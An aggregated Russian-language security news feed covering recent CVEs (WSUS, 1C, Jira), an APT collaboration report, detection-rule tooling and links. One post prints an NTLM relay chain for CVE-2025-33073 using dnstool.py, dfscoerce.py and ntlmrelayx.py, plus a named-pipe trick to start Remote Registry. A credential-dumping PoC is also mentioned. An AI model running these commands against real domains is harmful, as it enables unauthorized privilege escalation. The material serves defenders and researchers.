Fsecurity | HH

🔗Ссылка: https://bi.zone/expertise/blog/kak-ispolzovat-dannye-s-tenevykh-resursov-dlya-predskazaniya-kiberatak/

🔗Ссылка: https://github.com/qeeqbox/social-analyzer/

#infosec Эксплойт в открытом доступе запустил волну атак на WSUS. Windows-серверы крушат одним кликом 📌 Хакеры начали активно эксплуатировать уязвимость в службе обновлений Windows Server Update Services (WSUS). Ошибка зарегистрирована как CVE-2025-59287 и уже имеет публично доступный PoC-код, что значительно повышает риск массовых атак. Уязвимость затрагивает только серверы Windows, где включена роль WSUS Server и система настроена на распространение обновлений другим WSUS-инстансам в сети — этот режим по умолчанию обычно отключён. Microsoft выпустила внеплановые обновления, устраняющие уязвимость, и рекомендует установить их как можно скорее. Исправления доступны для всех поддерживаемых версий Windows Server: KB5070881 для Windows Server 2025, KB5070879 для версии 23H2, KB5070884 для 2022, KB5070883 для 2019, KB5070882 для 2016, а также KB5070886 и KB5070887 для 2012 R2 и 2012.

Метаданные файлов LibreOffice: извлечение, удаление и редактирование

Данная статья посвящена метаданным в файлах LibreOffice. Этот офисный пакет является бесплатным, у него открыт исходный код, он кроссплатформенный и довольно популярный. Имеет хорошую совместимость с MS Office и в целом является очень хорошей альтернативой MS Office.

🔗Ссылка: https://hackware.ru/?p=9290

🚨Участились попытки эксплуатации новой критической уязвимости 1С Предприятия - BDU:2025-07182 (Bypass авторизации). Уязвимость технологической платформы «1С:Предприятие 8» связана с недостатками процедуры авторизации. Эксплуатация уязвимости, может позволить нарушителю, действующему удаленно, получить несанкционированный доступ к системе от имени произвольного пользователя. CVSS 3.0: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS 3.1 8.8/10 BDU:2025-07182 Рекомендую как можно быстрее обновиться. 💫 @pentestnotes

🔗Ссылка: https://opennet.ru/64123/

🔗Ссылка: https://www.securitylab.ru/analytics/536141.php

Всем привет! А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : ) Итак, начнем с Coercов: 1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main 2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так: echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec. Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : ) Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:

# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs

🔗Ссылка: https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits

🔗Ссылка: https://habr.com/ru/companies/pt/articles/953314/

🔗Ссылка: https://github.com/SWE-agent/SWE-agent

🔎 RULEZET v1.1.0 Платформа с открытым исходным кодом для обмена, оценки, улучшения и управления правилами обнаружения (YARA, Sigma, Suricata и др.) с поддержкой API Форматы:

Yara Sigma Zeek Suricata Crs Nova Elastic

Пример:

title: Encoded or Base64 Payload in HTTP POST to F5 Management API
id: f5-base64-upload-2025
description: Detects long base64 strings in HTTP POST body to management or shared endpoints.
author: abdulmyid@gmail.com
status: experimental
logsource:
  product: webproxy
  service: http
detection:
  selection:
    http.method: POST
    url|contains:
      - '/mgmt'
      - '/shared'
    http.request.body|contains_regexp: '[A-Za-z0-9+/]{200,}={0,2}'
  condition: selection
level: medium
falsepositives:
  - Legitimate encoded payloads (token exchanges, APIs).

🔗 Web 💻 Repo #ti #rules #detection #soc #api ✈️ Whitehat Lab 💬 Chat

APT as a Service?😃 Premier Pass-as-a-Service — новый формат кибершпионажа Trend Micro зафиксировала новую модель сотрудничества между multiple China-aligned APT groups — Earth Estries и Earth Naga. Одна группа предоставляет готовый доступ («Premier Pass»), другая — разворачивает свои инструменты. Это делает шпионские кампании сложнее для атрибуции и детектирования. ⚙️ Формат атаки • Earth Estries скомпрометировала внутренние веб-сервера и установила CrowDoor (бэкдор через DLL-sideloading). • Через тот же доступ Estries передала контроль Earth Naga, которая развернула ShadowPad — известный фреймворк для постэксплуатации. • В сетях жертв фиксировались совместные артефакты: CrowDoor → ShadowPad, общий C2, и одинаковые временные файлы. • Обе группы параллельно атаковали телеком-операторов, госучреждения и ритейл в APAC и НАТО-регионах. 🧠 Новый тренд от Trend Micro Исследователи назвали модель Premier Pass-as-a-Service — аналог «доступа как услуги»:

Вместо продажи первичного входа, акторы предоставляют прямой доступ к уже закреплённым активам.

Это сдвигает фокус с Initial Access Brokers на операционные альянсы между APT-группами. Trend Micro выделила четыре уровня такой кооперации — от случайного пересечения до полного предоставления инфраструктуры («операционного бокса») для другой группы. Самый продвинутый тип — использование облачных сервисов (например, VSCode Remote Tunnel) как RAT-канала. 🧰 Инструментарий Earth Estries: • CrowDoor — DLL-sideload через LogServer.exe → VERSION.dll → зашифрованный shellcode. • Draculoader — загрузчик shellcode, финальные пейлоады CrowDoor / Cobalt Strike / HEMIGATE. • Cobalt Strike — lateral movement / payload-доставка. • Post-exploitation: AnyDesk, EarthWorm (SOCKS5 туннель), Blindsight (LSASS dump с NTFS evasion), кастомный SSP-дампер. Earth Naga: • ShadowPad — бэкдор с зашифрованным payload в реестре, загружается через bdreinit.exe → wer.dll. • Активно атакует гос- и телеком-сектор, Тайвань, APAC, НАТО, Латинскую Америку. 🧩 Что нового заметила Trend Micro 1) Коллаборация вместо одиночных кампаний — группировки действуют как «подрядчики» в единой операции. 2) Смещение стадии совместной работы — обмен происходит на поздних этапах (C2 и постэксплуатация), а не на этапе входа. 3) Роль-модель вместо атрибуции: разделение на разработчиков, провайдеров и операторов. 4) Доказательства общей инфраструктуры — CrowDoor и ShadowPad фиксируются в одной сессии, одних узлах. 5) «Operational box» и облачные туннели — новый способ маскировки C2 и снятия сетевых привязок. 📎 https://www.trendmicro.com/en_us/research/25/j/premier-pass-as-a-service.html 🦔 THF

⚙ CVE-2025-59287 Критическая уязвимость удалённого выполнения кода (RCE) в службе обновлений Windows Server (WSUS) от 💻 Microsoft Уязвимость позволяет не аутентифицированному пользователю осуществить удалённое выполнение кода с привилегиями уровня SYSTEM путём отправки вредоносных зашифрованных cookie Оценка по CVSS - 9,8 Причина:

Небезопасная десериализация данных AuthorizationCookie посредством BinaryFormatter в методе EncryptionHelper.DecryptData()

Для исправления поставить патч:

23 октября 2025 года выпущено внеплановое (OOB) обновление, устраняющее данную проблему. Это накопительное обновление, поэтому перед его установкой не требуется применять предыдущие обновления — оно заменяет все ранее выпущенные исправления для затронутых версий. Если вы еще не установили октябрьское обновление безопасности Windows 2025, мы рекомендуем установить именно это внеплановое обновление

🔗 Research 💻 PoC #wsus #cve #poc #windows ✈️ Whitehat Lab 💬 Chat

🔗Ссылка: https://habr.com/ru/companies/pt/articles/891406/

🔗Ссылка: https://opennet.ru/64111/

🔗Ссылка: https://www.securitylab.ru/news/565033.php

📄 Catching Credential Guard Off Guard Credential Guard was supposed to end credential dumping. It didn't. @bytewreck just dropped a new blog post detailing techniques for extracting credentials on fully patched Windows 11 & Server 2025 with modern protections enabled. 🔗 DumpGuard Proof-of-Concept tool for extracting NTLMv1 hashes from sessions on modern Windows systems.

P.S. Previously, crack.sh operated a free service for performing rainbow table lookups to recover NT hashes from NTLMv1 responses, but was recently shut down due to maintenance issues. In its absence, a new free service was published at ntlmv1.com.

📄 Catching Credential Guard Off Guard Credential Guard was supposed to end credential dumping. It didn't. @bytewreck just dropped a new blog post detailing techniques for extracting credentials on fully patched Windows 11 & Server 2025 with modern protections enabled. 🔗 DumpGuard Proof-of-Concept tool for extracting NTLMv1 hashes from sessions on modern Windows systems.

P.S. Previously, crack.sh operated a free service for performing rainbow table lookups to recover NT hashes from NTLMv1 responses, but was recently shut down due to maintenance issues. In its absence, a new free service was published at ntlmv1.com.

🚨 Уязвимость Path Traversal в Jira (CVE-2025-22167) Баг позволяет записывать файлы в любую доступную JVM-папку. При комбинировании с другими эксплойтами возможен RCE. CVSS 8.7 Подробности: atlassian.com 📌 Проверьте свои инстансы и обновитесь как можно скорее.